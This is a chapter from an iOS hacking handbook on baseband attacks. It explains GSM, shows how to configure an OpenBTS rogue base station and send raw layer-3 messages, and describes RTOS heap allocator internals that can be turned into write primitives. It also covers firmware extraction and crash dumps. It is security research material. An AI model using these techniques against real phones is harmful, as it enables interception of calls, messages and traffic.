Chapter 11
Baseband Attacks
The communication stack for cellular networks in iOS devices is running on a dedicated chip, the so-called digital baseband processor. Having control over the baseband side of an iPhone allows an adversary to perform a variety of interesting attacks related to the “phone” part of a device, such as monitoring incoming and outgoing calls, performing calls, sending and intercepting short messages, intercepting IP traffic, as well as turning the iPhone into a remotely activated microphone by activating its capability to auto-answer incoming calls. This chapter explores how memory corruptions can be triggered in the baseband software stack and how an attacker can execute custom code on the baseband processor. To attack a device over the air, an adversary would operate a rogue base station in close enough proximity to the target device such that the two can communicate (see Figure 11.1).
But baseband attacks do not necessarily need to be remote attacks. For a long time, the driving factor for memory corruption research in the baseband stack was the demand for unlocking iPhones; in many countries iPhones are sold at a subsidized price when users buy them bundled with a long-term contract with a carrier. The downside of this practice is that the phone will work only with SIM cards from the carrier that sold the phone. This check — the network lock — is enforced in the baseband processor of the telephone, which talks to the SIM card. The memory corruptions exploited in this context are described as local vulnerabilities when contrasted to the vulnerabilities that can be exploited over the air.
This chapter is concerned only with attacks over the Global System for Telecommunications (GSM) air interface and local attacks through the AT command parser. Although, in principle, attacks over the Code Division Multiple Access (CDMA) air interface might be possible as well, hardware and software for setting up rogue CDMA base stations is much harder to acquire, and attacks against the Qualcomm CDMA stack have not been studied by us nor publicly demonstrated by anyone else thus far. Similarly, although cellular networks in generations later than GSM, such as Universal Mobile Telecommunications Standard (UMTS) and Long Term Evolution (LTE), provide a much richer attack surface, they are not considered in this chapter.
But before getting to the gist of the attacks we describe, we take a brief look at the target environment. Just like the application processor, the baseband processor is an ARM-based CPU; however, it does not run iOS but rather a dedicated real-time operating system (RTOS). Different generations of iPhones and iPads use different baseband processors and RTOSes. Table 11.1 gives an overview of which one is used in which device.
Processor | Devices chip is used in | RTOS |
Infineon S-Gold 2
(ARM 926) |
iPhone 2G | Nucleus PLUS
(Mentor Graphics) |
Infineon X-Gold 608
(ARM 926) |
iPhone 3G/3GS,
iPad 3G (GSM) |
Nucleus PLUS
(Mentor Graphics) |
Infineon X-Gold 618
(ARM 1176) |
iPhone 4,
iPad 2 3G (GSM) |
ThreadX
(Express Logic) |
Qualcomm MDM6600
(ARM 1136) |
iPhone 4 (CDMA)
iPad 2 3G (CDMA) |
REX on OKL4
(Qualcomm) |
Qualcomm MDM6610 (variation of MDM6600) | iPhone 4S | REX on OKL4 (Qualcomm) |
GSM is a suite of standards for digital cellular communications. It was developed in the 1980s by the European Conference of Postal and Telecommunication Administrators (CEPT); in 1992, development was moved over to the European Telecommunications Standards Institute (ETSI). GSM is considered a second-generation wireless telephony technology and is used to serve more than two billion cellular subscribers in more than 200 countries.
The International Telecommunication Union (ITU) has assigned a total of 14 different frequency bands to the GSM technology; however, only four of them are relevant. In North America, GSM-850 and GSM-1900 are used. In the rest of the world, with the exception of South and Central America, GSM-900 and GSM-1800 are used. In South America, GSM-850 and GSM-1900 are primarily used; however, there are a number of exceptions. All of the GSM-enabled iOS devices are quad-band devices supporting GSM-850, GSM-900, GSM-1800, and GSM-1900. Regardless in which location you turn on your device, all channels on all four bands will be scanned for valid signals.
Let us now quickly dissect the GSM protocol stack. On the physical layer, GSM uses Gaussian Minimum Shift Keying (GMSK) as a modulation scheme; the channels are 200KHz wide and use a bit rate of approximately 270.833 kbit/s. Both Frequency Division Multiple Access (FDMA) and Time Division Multiple Access (TDMA) are employed. To enable simultaneous sending and receiving, a technique called Frequency Division Duplex is employed: Transmission between the Mobile Station (MS) and the Base Transceiver Station (BTS) is achieved on two different frequencies separated by a fixed duplex distance for each band. Data transmitted from the MS to the BTS is sent on the uplink; correspondingly, the opposite direction is called downlink. On top of the physical channels defined by the preceding TDMA scheme, layer 1 of the air interface lays a number of logical channels that are mapped onto the physical channels used by multiplexing. Many different types of logical channels exist — which we do not describe in further detail here — but they can be neatly split into two categories: traffic channels for the transport of user data and signaling channels that transport signaling information, such as location updates, between the BTS and the MS.
Going up in the GSM protocol stack on the Um interface you arrive at layer 2, on which LAPDm, a derivative of ISDN's LAPD (ITU Q.921) and reminiscent of HDLC, is spoken. Data transmitted on layer 2 is encapsulated, using either unnumbered information frames (if acknowledgment, flow control, and layer 2 error correction is not needed) or in information frames (positive acknowledgment, flow control, and layer 2 error control provided). A layer 2 Connection End Point (CEP) is denoted by so-called Data Link Connection Identifiers (DLCI), which are comprised of two elements: a Service Access Point Identifier (SAPI) and a Connection Endpoint Identifier (CEPI).
The next layer of the cellular stack is layer 3, which is divided into three sublayers: Radio Resource Management (RR), Mobility Management (MM), and Connection Management (CM). The RR layer is responsible for the establishment of a link between the MS and the MSC and allocates and configures dedicated channels for this. The MM layer handles all aspects related to the mobility of the device, such as location management, but also authentication of the mobile subscriber. The CM layer can again be split into three distinct sublayers, which are not stacked on top of each other but rather are side by side: Call Control (CC) is the sublayer responsible for functions such as call establishment and teardown. The other sublayers are Supplementary Services (SS) and Short Message Service (SMS). The last two sublayers are independent of calls. See Figure 11.2 for an overview of the GSM Um interface as served by the cellular stack running on the baseband processor.
In recent years, two open-source projects appeared that began building solutions for setting up and running GSM networks. This has significantly lowered the entry cost for performing GSM security research; in fact, one could say that this was the key event enabling baseband attacks to become practical for the average hacker. Although the two projects — OpenBSC and OpenBTS — are similar in their goals, they take different approaches. Whereas OpenBSC uses existing, commercially available GSM base transceiver stations (BTSes) and acts a base station controller (BSC), OpenBTS uses a software-defined radio — the USRP platform — to run a GSM base station completely in software, including modulation and demodulation. OpenBTS reduces the hardware cost of running a GSM base station to less than USD 2000. Next, we detail how to set up your own little GSM network for testing purposes.
OpenBTS uses a software-defined radio approach to implement the BTS side of the Um interface. To operate a GSM network with OpenBTS, you currently need a Universal Software Radio Peripheral (USRP) by Ettus Research, LLC (now owned by National Instruments); in the future OpenBTS might have support for an increased number of software-defined radios. A USRP contains several analog-digital converters (ADCs) and digital-analog converters (DACs) connected to an FPGA. This, in turn, communicates to the host computer through a USB or a Gigabit-Ethernet interface, depending on the model. The actual RF hardware is contained in so-called daughterboards that are mounted onto the USRP mainboard. Ettus sells several transceiver daughterboards covering the GSM frequency ranges, namely the RFX900 covering 750MHz to 1050MHz, the RFX1800 covering 1.5GHz to 2.1GHz, and the WBX board covering 50MHz to 2.2GHz. All of these daughterboards can send and receive at the same time. However, note that in the case of operating the USRP with a single daughterboard, significant leakage of the transmitted signal into the receive circuit occurs, effectively limiting the range of your system. The recommended configuration is to run OpenBTS with two RFX daughterboards. Another thing to note is that RFX1800 can be converted into RFX900 daughterboards by simply reflashing their EEPROM. However, the RFX900 daughterboards contain a filter that suppresses the signal outside of the 900MHz ISM band (frequency range: 902–928 MHz). Therefore, if you bought an RFX900 daughterboard for the transmit side, you either need to remove the ISM filter by de-soldering it or by restricting yourself to the ARFCNs 975-988 in the EGSM900 band.
Unfortunately, the internal clock of the USRP devices is too imprecise to allow reliable operation with anything but the most tolerant of cellphones. Additionally, operating the USRP at 64MHz for GSM isn't recommended; instead you should use a multiple of the GSM bit symbol rate to make downsampling more efficient. For GSM, usually a reference clock of 13MHz (48 times the GSM bit rate) or 26MHz is used to achieve this in handsets, and for the USRP the most common option is to use a 52MHz clock. However, you can feed an external clock signal to the USRP to deal with both of these issues. Please note that feeding an external clock to a USRP1 needs a reclocking modification of the USRP1 motherboard that involves some surface mount soldering. These steps are described on the ClockTamer installation page (https://code.google.com/p/clock-tamer/wiki/ClockTamerUSRPInstallation). The ClockTamer is a small clock generator with optional GPS synchronization that is manufactured by a Russian company called FairWaves; at the same time, it is an open source hardware project. This module fits neatly into the USRP enclosure.
For newer USRPs, such as the USRP2, the E1x0, N2x0, and B1x0 reclocking modifications are not necessary; the clock signal can be simply fed into the external clock input. However, note that to operate these you will need a version of OpenBTS supporting UHD devices.
We show you how to install OpenBTS and set up a minimal configuration for playing the role of a malicious base station. The accompanying materials for this book (www.wiley.com/go/ioshackershandbook) include a VirtualBox image that installs all of the dependencies required to operate a USRP1 with a 52MHz clock on first boot and then can be used as a self-contained playground for testing baseband attacks.
The following is a unified diff between the example configuration included in the OpenBTS 2.6 distribution and the configuration used later in this chapter:
--- OpenBTS.config.example 2012-03-12 11:20:43.993739075 +0100 +++ OpenBTS.config 2012-03-12 11:31:27.029729225 +0100 @@ -30,3 +30,3 @@ # The initial global logging level: ERROR, WARN, NOTICE, INFO, DEBUG, DEEPDEBUG -Log.Level NOTICE +Log.Level INFO # Logging levels can also be defined for individual source files. @@ -86,4 +86,4 @@ # YOU MUST HAVE A MATCHING libusrp AS WELL!! -TRX.Path ../Transceiver/transceiver -#TRX.Path ../Transceiver52M/transceiver +#TRX.Path ../Transceiver/transceiver +TRX.Path ../Transceiver52M/transceiver $static TRX.Path @@ -182,3 +182,3 @@ # Things to query during registration updates. -#Control.LUR.QueryIMEI +Control.LUR.QueryIMEI $optional Control.LUR.QueryIMEI @@ -197,3 +197,3 @@ # Maximum allowed ages of a TMSI, in hours. -Control.TMSITable.MaxAge 72 +Control.TMSITable.MaxAge 24 @@ -259,3 +259,3 @@ # Location Area Code, 0-65535 -GSM.LAC 1000 +GSM.LAC 42 # Cell ID, 0-65535 @@ -286,5 +286,5 @@ # Valid ARFCN range depends on the band. -GSM.ARFCN 51 +#GSM.ARFCN 51 # ARCN 975 is inside the US ISM-900 band and also in the GSM900 band. -#GSM.ARFCN 975 +GSM.ARFCN 975 # ARFCN 207 was what we ran at BM2008, I think, in the GSM850 band. @@ -295,3 +295,3 @@ # Should probably include our own ARFCN -GSM.Neighbors 39 41 43 +GSM.Neighbors 39 41 975 #GSM.Neighbors 207
Please take care to adjust GSM.ARFCN, GSM.Band and GSM.Neighbours according to the frequency that you have been authorized to transmit on.
Note that by default you are running OpenBTS in a so-called open configuration — meaning that any mobile device that tries to register with the test network will allowed to. This may have unwanted side effects, especially if you have not properly limited your transmission power and/or are in an area where other networks only have weak signals. Devices may inadvertently roam into your network. To prevent this, you can run OpenBTS in a closed configuration that requires each IMSI to be registered with Asterisk.
After having connected your hardware, you should perform a simple check to see whether everything is set up correctly. For this test, you can use the testcall functionality that you will later also use to transmit raw GSM layer 3 messages. First, install the libmich library (from https://github.com/mitshell/libmich, not required if you use the virtual machine provided), a nifty library to create layer 3 messages using a Python interface. Next, start OpenBTS and register your iPhone with the test network. To select the test network, disable the automatic selection of the network in the Carrier section of the Settings application and choose the mobile network with the name 00101.
If you have trouble seeing or registering with your test network, it can help to put the iPhone into airplane mode for at least 5 seconds. Disable airplane mode after that and perform the network selection procedure again; your phone will now perform a full scan.
After having registered with the network, you can simulate the first stage of a call establishment. Use the following commands to set up a traffic channel to the iPhone:
OpenBTS> tmsis TMSI IMSI IMEI(SV) age used 0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX 293s 293s 1 TMSIs in table OpenBTS> testcall 262XXXXXXXXXXXX 60 OpenBTS> calls 1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState=Null (2 sec) 1 transactions in table
In the previous example, the command tmsis shows a mapping of the Temporary Mobile Subscriber Identitiy (TMSI) of the registered iPhone to its International Mobile Subscriber Identity (IMSI) together with the International Mobile Equipment Identity and Software Version (IMEISV) as well as the time of initial registration and the time of last use. The testcall command opens a UDP socket — by default on port 28670 — and a traffic channel to the mobile device specified by IMSI in the second argument. The number of seconds this channel should be held open is specified in the second argument. This allows you to send datagrams to the UDP port that are forwarded as GSM layer 3 packets to the mobile device and vice versa. At any time, only a single testcall instance can be active. To see which calls are established you can use the calls command.
You then run the following simple Python script in another terminal to simulate call setup:
import socket import time from libmich.formats import * TESTCALL_PORT = 28670 tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) tcsock.sendto(str(L3Mobile.SETUP()), (‘127.0.0.1’, TESTCALL_PORT))
After you execute this script, your iPhone should ring. Please note that you are not following the state transitions after sending the initial call setup message; hence the phone will appear to be frozen while ringing. Simply shut down OpenBTS if this test has worked.
You did not have to configure Asterisk in the previous description because you were operating OpenBTS in open configuration. If you want to operate OpenBTS in closed configuration or to make calls between multiple registered phones on your test network, you will not be able to get around at least a basic configuration of Asterisk. As a bare minimum, you can simply append the following lines to the default extensions.conf
[sip-openbts] exten => 6666,1,Dial(SIP/IMSI2620XXXXXXXXX) exten => 7777,1,Dial(SIP/IMSI2620YYYYYYYYYYY)
and the following lines to the default sip.conf:
[IMSI2620XXXXXXXXXXX] callerid=6666 canreinvite=no type=friend context=sip-openbts allow=gsm host=dynamic [IMSI2620YYYYYYYYYY] callerid=7777 canreinvite=no type=friend context=sip-openbts allow=gsm host=dynamic
Please make sure that both the context and the IMSI identifiers match between sip.conf and extensions.conf.
The cellular baseband of a modern smartphone can be seen as an independent subsystem — it is running its own operating system on its own processor with dedicated coprocessors (for example, DSPs, crypto, and 3G coprocessors). This can be attributed to the real-time requirements for cellular communications. Consequently, the operating systems running underneath the cellular stack are dedicated real-time operating systems, sometimes proprietary to the vendor of the baseband stack — as in the case of Qualcomm's REX. More commonly, however, the owner of the cellular stack simply has licensed a commercially available OS on which to run his cellular stack. The primary tasks of these operating systems is to manage resources such as processors, memory, and attached devices — efficiently, and with real-time constraints — which makes them often appear much different than a desktop operating system, although they are not.
The following sections give you a brief exposition of the three different real-time operating systems that are in use by different versions of iOS devices. They also explain how task/thread control, inter-task/thread communication and locking mechanisms, memory management, and memory protection work for each of them.
Nucleus PLUS is a widely used commercial RTOS distributed by Mentor Graphics. It is shipped in source form to the paying licensees. The baseband of the S-Gold 2 as well as of the X-Gold 608 run on Nucleus PLUS. Unfortunately, no good public documentation on Nucleus PLUS is available; however, the official manuals have leaked.
Units of execution in Nucleus PLUS are called tasks. Tasks can be dynamically created and deleted in Nucleus PLUS and run at a priority defined at task creation time. For each priority level, all tasks on this level are run time sliced in a round-robin fashion; they can also explicitly relinquish the processor. Tasks can preempt other tasks that have a lower priority. Preemption can be disabled — not only globally but also for each task individually. Interrupt Service Routines (ISR) are different kinds of execution units. Several different types of ISRs are distinguished. The first kind is the User ISR, which cannot use any Nucleus PLUS services and needs to save and restore the registers it uses itself. They are tied directly to an interrupt vector and are not registered through Nucleus PLUS. Next are low-level ISRs (LISRs), which are first-level interrupt handlers; and high-level ISRs (HISRs), which are second-level interrupt handlers. LISRs have only limited access to Nucleus PLUS services and are tied to an interrupt vector, whereas HISRs are scheduled similarly to tasks and may call most of the Nucleus PLUS services.
Nucleus PLUS distinguishes two different kinds of memory allocations: partition memory and dynamic memory. Both types of memories are managed in memory pools that need to be defined first before allocations can be taken from them. Tasks can be suspended when the allocation cannot be immediately performed, causing them to wait until a suitable chunk of memory becomes free. Partition memory is a form of memory that allows allocations only in fixed-sized blocks. Each call to the allocation function obtains one block of exactly that fixed size from the pool. This type of memory management is very common for embedded systems with real-time constraints because it allows memory allocations to occur with constant execution time. Moreover, partition memory is more space efficient because there is no need to store allocation meta data for the blocks. Dynamic memory, on the other hand, allows variable-sized allocations from the pool, similar to a regular malloc() implementation. (Please also consult the “Heap Implementations” section later in this chapter for the internals of the heap implementations.)
For task synchronization and mutual exclusion semaphores can be used. The semaphores implemented by Nucleus PLUS are counting semaphores.
Several means exist for tasks to communicate with each other: Mailboxes can be dynamically created and deleted. They are the most primitive means for data transfer. Each mailbox can hold only a single message consisting of exactly four 32-bit words. More powerful primitives are pipes and queues: Now you can send multiple messages that consist of one or more bytes (pipes), respectively 32-bit words (queues). Both variable-and fixed-length pipes and queues can be created; their type is defined at time of creation. Messages are sent and received by value and not by reference; broadcast messages are supported, and all tasks waiting for a message from a queue will wake up and receive these messages.
Other concepts for signaling and synchronization between tasks supported by Nucleus PLUS are event groups, and signals. All of these, however, have an extremely limited bandwidth.
ThreadX is the direct successor of Nucleus PLUS; both operating systems were written by the same software engineer, William Lamie. Just like Nucleus, ThreadX is distributed to licensees in source form, but by a different company — Express Logic. Compared to Nucleus PLUS, the complexity of the API has significantly decreased, and the interrupt architecture was overhauled. In contrast to the other operating systems described in this chapter, Edwards C. Lamie offers Real-Time Embedded Multithreading: Using ThreadX and ARM (ISBN 1578201349 CMP, 2005) which is a good book on ThreadX that covers its implementation in detail. Due to this fact and its close relation to Nucleus PLUS, we do not further describe its idiosyncrasies in this chapter.
Real-time Executive System (REX) is an RTOS developed by Qualcomm for its Mobile Station Modem (MSM) products. It is employed by the Advanced Mobile Subscriber Software (AMSS) running on the MDM66x0 chips. Beginning in late 2006, Qualcomm made a major design innovation to its cellular stack: An L4-derived microkernel, OKL4, was propped underneath REX. Luckily, some versions of OKL4 are freely available in source form, which significantly simplifies the analysis of AMSS.
OKL4 is merely the microkernel of the system. The actual meat of the operating system, such as virtual memory management and process management, is implemented in Iguana, an L4 server, for which source code is freely available. The unit of execution in Iguana and L4 is called a thread. In fact, Iguana threads are L4 threads and can be manipulated through the L4 API as well as through an Iguana API.
Iguana uses a single address space to make sharing of data efficient and employs per-process protection domains to enforce its security policy. A protection domain can be seen as the equivalent of a process in a traditional operating system and defines what resources a process can access.
Memory sections are contiguous ranges of virtual pages; they are the basic units of virtual memory allocation and protection in Iguana. Memory sections can be created both at boot time and at run time using memsection_create().
A significant difference between OKL4/Iguana and the other operating systems discussed in this chapter is that only the operating system and not the actual application — in our case the cellular stack — runs in supervisor mode. AMSS, including drivers, is completely run in user mode.
This section dives in head first into the internals of heap memory management of the operating systems. You should be somewhat familiar with exploiting heap buffer overflows already to make use of the information presented here.
Nucleus PLUS uses a simplistic first-fit allocator for managing dynamic memory. For each pool created using NU_Create_Memory_Pool(), a pool control block of the following layout is created:
struct dynmem_pcb { void *cs_prev; void *cs_next; uint32_t cs_prio; void *tc_tcb_ptr; uint32_t tc_wait_flag; uint32_t id; /* magic value [‘DYNA’] */ char name[8]; /* Dynamic Pool name */ void *start_addr; /* Starting pool address */ uint32_t pool_size; /* Size of pool */ uint32_t min_alloc; /* Minimum allocate size */ uint32_t available; /* Total available bytes */ struct dynmem_hdr *memory_list; /* Memory list */ struct dynmem_hdr *search_ptr /* Search pointer */ uint32_t fifo_suspend; /* Suspension type flag */ uint32_t num_waiting; /* Number of waiting tasks*/ void *waiting_list; /* Suspension list */ };
Each chunk of memory allocated with NU_Allocate_Memory() has a header of the following structure (16 bytes):
struct dynmem_hdr { struct dynmem_hdr *next_blk, /* Next memory block */ *prev_blk; /* Previous memory block */ bool is_free; /* Memory block free flag */ struct dynmem_pcb *pool_pcb; /* Dynamic pool pointer */ }
Initially, before dynamic memory can be allocated, at least one pool needs to be created with NU_Create_Memory_Pool(pcb, name, start_addr, size, min_alloc, suspend_t):
This pool causes the pcb to be initialized, with a single chunk of size (pool_size - 2 * dynmem_hdr) ending up in the cyclic list pointed to by pcb->memory_list.
Allocating a chunk of memory with NU_Allocate_Memory(pcb, &ptr_to_allocation, size, NU_NO_SUSPEND) then causes the following algorithm to be executed:
To deallocate a memory block using NU_Deallocate_Memory(blk), the deallocation function assumes that blk is preceded by a dynmem_hdr.
No checks are performed on the dynmem_hdr structure itself, but it is checked that the pool pointer is not NULL, and that the magic value in the pool control block matches. After having marked the block as free again and having adjusted the number of available bytes in the pool, the function first checks whether the freed block can be merged with its previous block, then it checks whether it can be merged with the next block by looking at the is_free flags of the header of these blocks. This procedure is commonly called coalescing. This is the operation that gives an attacker a so-called unrestricted write4 primitive, a powerful way to turn a heap buffer overflow into the ability to write an arbitrary 32-bit value at any location in memory.
ThreadX also uses a first-fit allocator that works in a very similar fashion to the one described for Nucleus PLUS; yet it still is distinct enough to warrant a detailed description of its own. The control block of a byte pool has the following structure (taken from tx_api.h):
typedef struct TX_BYTE_POOL_STRUCT { /* Define the byte pool ID used for error checking. */ ULONG tx_byte_pool_id; /* Define the byte pool's name. */ CHAR_PTR tx_byte_pool_name; /* Define the number of available bytes in the pool. */ ULONG tx_byte_pool_available; /* Define the number of fragments in the pool. */ ULONG tx_byte_pool_fragments; /* Define the head pointer of byte pool. */ CHAR_PTR tx_byte_pool_list; /* Define the search pointer used for initial searching for memory in a byte pool. */ CHAR_PTR tx_byte_pool_search; /* Save the start address of the byte pool's memory area. */ CHAR_PTR tx_byte_pool_start; /* Save the byte pool's size in bytes. */ ULONG tx_byte_pool_size; /* This is used to mark the owner of the byte memory pool during a search. If this value changes during the search, the local search pointer must be reset. */ struct TX_THREAD_STRUCT *tx_byte_pool_owner; /* Define the byte pool suspension list head along with a count of how many threads are suspended. */ struct TX_THREAD_STRUCT *tx_byte_pool_suspension_list; ULONG tx_byte_pool_suspended_count; /* Define the created list next and previous pointers. */ struct TX_BYTE_POOL_STRUCT *tx_byte_pool_created_next, *tx_byte_pool_created_previous; } TX_BYTE_POOL;
The header of a memory block simply consists of a field for indicating whether this particular memory chunk is allocated (indicated by the magic value 0xFFFFEEEE) or still considered “free” and a pointer back to the byte pool control block:
struct bpmem_hdr { uint32_t is_free_magic; /* set to 0xFFFFEEEE if block is free */ TX_BYTE_POOL bpcb; /* pointer to control block of byte memory pool */ }
The tx_byte_allocate() function, used to allocate a block of memory from a given pool, does not traverse tx_byte_pool_list directly, but rather calls a function, find_byte_block(), that does this. The same function also is called from tx_byte_release() if another thread has suspended on the pool. Coalescing does not happen directly when a block of memory is freed, but is delayed. Only the field is_free_magic of the header is updated on the call of tx_byte_release() if no other threads are waiting. Rather, coalescing of adjacent memory blocks marked as free happens in find_byte_block() in case no memory block of the requested size can be found.
Looking closely at a Qualcomm stack, you will see that AMSS actually uses several different heap implementations. Because the Iguana allocator is not used for buffers allocated by the modem stack, it does not make sense for us to describe this allocator here. Rather, we investigate the most widely used allocator, which seems to be something like a system allocator on AMSS and is assumed to be called modem_mem_alloc() judging from strings found in the amss.mbn binary.
In contrast to the previous allocators, this allocator is a best-fit allocator that is significantly more complicated than the previously described allocators and is somewhat hardened. We will not be able to describe the allocator in full detail here, but rather will concentrate on the most relevant features of it that will allow you to get a head start in further reverse-engineering:
Instead of having one list of memory chunks, the allocator keeps 31 bins of memory chunks of different sizes: These bins can accommodate memory allocations up to 0x4, 0x6, 0x8, 0xC, 0x10, 0x18, 0x20, 0x30, 0x40, 0x60, 0x80, 0xC0, 0x100, 0x180, 0x200, 0x300, 0x400, 0x600, 0x800, 0xC00, 0x1000, 0x1800, 0x2000, 0x3000, 0x4000, 0x6000, 0x8000, 0xC000, 0x10000, 0x18000 and 0x20000 respectively. The actual sizes of the blocks in the bins are 16 bytes larger than the size indicated by the bin to account for metadata and align to an 8-byte boundary. The header of a memory block looks as follows:
struct mma_header { uint32_t size; /* size of allocation */ uint32_t *next; /* pointer to next block */ uint8_t reference; /* reference value to distinguish different callers */ uint8_t blockstatus; /* determines whether block is free or taken */ uint8_t slackspace; /* slack space at end of block */ uint8_t canary; /* canary value to determine memory corruption */ }
For free blocks the following data structure is used:
struct mma_free_block { mma_header hdr; mma_header *next_free, *prev_free; /* doubly linked list of free blocks */ }
The canary value used by the allocator is 0x6A. Whenever mma_header structure is accessed, a check is performed to determine whether the canary value is still intact; a crash will be forced if it is not the case. This feature however is mostly relevant for accidental and not for intentional memory corruptions; it is something to keep in mind when trying to fuzz the stack, however. Another noteworthy feature for heap exploitation is the fact that the allocator checks whether pointers that are passed to the modem_mem_free(ptr) function really point to a memory area used by the heap. Creating fake heap structures on the stack henceforth will not work.
As of iOS 5.1, the heap allocator described previously has been hardened by adding a safe-unlinking check: Before performing an unlinking operating, the allocator will check whether free_block->next_free->prev_free == free_block->prev_free->next_free.
The previous subsections of this chapter covered the ground you need to be familiar with by providing just enough details about GSM and real-time operating systems to proceed to the core of the matter: finding exploitable vulnerabilities. Before we get there, we still need to explain a couple of operational matters to get to the actual analysis.
Upgrades of the baseband firmware are performed during the normal iOS upgrade/restore process. For older iPhones, up to the 3GS as well as the iPad 1, this firmware is contained in the ramdisk image. To extract it, you need to decrypt this image, mount it, and copy the firmware image from /usr/local/standalone/firmware. To extract the iPhone 2G baseband firmware ICE04.05.04_G.fls from the decrypted iOS 3.1.3 update, you can use the following sequence of steps once you have planetbeing's wonderful xpwntool installed (you can download it from https://github.com/planetbeing/xpwn).
$ wget -q http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/ 061-7481.20100202.4orot/iPhone1,1_3.1.3_7E18_Restore.ipsw $ unzip iPhone1,1_3.1.3_7E18_Restore.ipsw 018-6488-015.dmg Archive: iPhone1,1_3.1.3_7E18_Restore.ipsw inflating: 018-6494-014.dmg $ xpwntool 018-6494-014.dmg restore.dmg -k 7029389c2dadaaa1d1e51bf579493824 -iv 25e713dd5663badebe046d0ffa164fee $ open restore.dmg $ cp /Volumes/ramdisk/usr/local/standalone/firmware/ICE04.05.04_G.fls . $ hdiutil eject /Volumes/ramdisk
For newer iPhones and the iPad 2, the baseband firmware can be directly extracted from the IPSW using unzip. In Listing 11.1, the ICE3 firmware is the version running on the X-Gold 61x in the iPhone 4, and the Trek file is used to upgrade the firmware running on the MDM6610 in the iPhone 4S.
Listing 11.1: Baseband firmwares contained in the iPhone 4S 5.0.1 update
$ unzip -l iPhone4,1_5.0.1_9A406_Restore.ipsw Firmware/[IT]*bbfw Archive: iPhone4,1_5.0.1_9A406_Restore.ipsw Length Date Time Name -------- ---- ---- ---- 3815153 12-04-11 02:07 Firmware/ICE3_04.11.08_BOOT_02.13.Release.bbfw 11154725 12-04-11 02:07 Firmware/Trek-1.0.14.Release.bbfw -------- ------- 14969878 2 files
The .bbfw files themselves are ZIP archives as well and contain the actual baseband firmware together with a number of loaders:
$ unzip -l ICE3_04.11.08_BOOT_02.13.Release.bbfw Archive: ICE3_04.11.08_BOOT_02.13.Release.bbfw Length Date Time Name -------- ---- ---- ---- 72568 01-13-11 04:14 psi_ram.fls 64892 01-13-11 04:14 ebl.fls 7308368 12-04-11 02:07 stack.fls 40260 01-13-11 04:14 psi_flash.fls -------- ------- 7486088 4 files $ unzip -l Trek-1.0.14.Release.bbfw Archive: Trek-1.0.14.Release.bbfw Length Date Time Name -------- ---- ---- ---- 19599360 12-03-11 10:06 amss.mbn 451464 12-03-11 10:06 osbl.mbn 122464 12-03-11 10:06 dbl.mbn 122196 12-03-11 10:06 restoredbl.mbn -------- ------- 20295484 4 files
Here we are only interested in the stack.fls for the X-Gold and in the amss.mbn for the MDM66x0 chipsets. All other files are loader files, which we don't investigate further; although these may in principle contain security-critical bugs — for instance, in the signature verification of the firmware, which would allow you to run different firmware on the phone and hence unlock it.
Infineon .fls files are built using an official ARM Compiler Toolchain — either ARM RealView Suite (RVDS) or ARM Development Suite (ADS), depending on the version of the baseband firmware. The ARM linker employs a so-called “scatter loading” mechanism to save flash space. In the link run, all code segments and data segments with initialized data are concatenated; optionally, segments can be compressed using one of two simple run-length encoding algorithms. A table is built with pointers to these regions and entries for regions that need to be zero-initialized. During run time, startup code iterates over this table, copies the segments to their actual locations in memory, and creates zero-initialized memory regions as specified.
This means that before you can perform any meaningful analysis on the .fls files, you need to perform the same steps the startup code does. You have several ways to do this: the first is described in an IDA Pro tutorial and involves using the QEMU emulator to simply execute the startup sequence. The second way to get the firmware relocated to its in-memory layout is by using a script or a loader module. A universal scatter loading script written by roxfan has been circulating among iPhone hackers for a while. We have decided to write and release an IDA Pro module (flsloader) for iPhone baseband firmware that incorporates this functionality. You can download this code from the companion website of the book (www.wiley.com/go/ioshackershandbook). There you also find a script make_tasktable.py that automatically identifies the table of tasks that are created by, for instance, Application_Initialize() on Nucleus PLUS or tx_application_define() on ThreadX. This greatly enhances IDA Pro's auto-analysis.
Qualcomm's firmware files are in standard Executable and Linkable Format (ELF); you do not need a custom IDA Pro loader module to load them.
If you look closely at the connection between the baseband processor and the application processor, it becomes clear that talking to the AT command interpreter doesn't happen directly over a serial line, but rather that many things are multiplexed over either a serial line (Infineon-based chips) or over USB (Qualcomm). For the Infineon basebands, the multiplexing is done in a kernel extension com.apple.driver.AppleSerialMultiplexer according to 3GPP 27.007. For Qualcomm baseband processors, a Qualcomm proprietary protocol called Qualcomm MSM Interface (QMI) is used. Source code for an implementation of QMI exists in the Linux kernel fork for the MSM platform created by the CodeAurora Forum (https://www.codeaurora.org/contribute/projects/qkernel).
For analyzing vulnerabilities — and more importantly, for actually exploiting them — it is extremely useful to have some visibility of the state of the system at the time of the crash and, if possible, at run time.
For iOS devices with an Infineon baseband, you can use the AT+XLOG command to obtain a log of baseband crashes and their stack traces. Even better, on the X-Gold chips there's a way to trigger a core dump of the baseband memory without actually needing to exploit a bug first. To do this, you first need to enable the functionality, which you can do with a special dial string through the Phone dialer (this is parsed by CommCenter). By calling the number *5005*CORE#, you can enable the core dump functionality (#5005*2673# turns it off again and *#5005*2673# shows the status of the setting). Using minicom, you can send the AT command AT+XLOG=4 to the baseband to trigger an exception; this will cause the baseband memory to be dumped. This dump is segmented by memory region and will be stored in a directory of the form log-bb-yyyy-mm-dd-hh-mm-ss-cd in /var/wireless/Library/Logs/CrashReporter/Baseband:
# cd /var/wireless/Library/Logs/CrashReporter/Baseband /log-bb-2012-01-17-11-36-07-cd # ls -l total 9544 -rw-r--r-- 1 _wireless _wireless 65544 Jan 17 11:36 0x00090000.cd -rw-r--r-- 1 _wireless _wireless 16760 Jan 17 11:39 0x40041000.cd -rw-r--r-- 1 _wireless _wireless 262152 Jan 17 11:40 0x40ac0000.cd -rw-r--r-- 1 _wireless _wireless 262152 Jan 17 11:40 0x40b00000.cd -rw-r--r-- 1 _wireless _wireless 539372 Jan 17 11:36 0x60700000.cd -rw-r--r-- 1 _wireless _wireless 8564860 Jan 17 11:39 0x60784ae4.cd -rw-r--r-- 1 _wireless _wireless 16392 Jan 17 11:36 0xffff0000.cd
If you have done everything correctly, you will see a message stating Baseband Core Dump in Progress on the screen of your iPhone for a number of seconds.
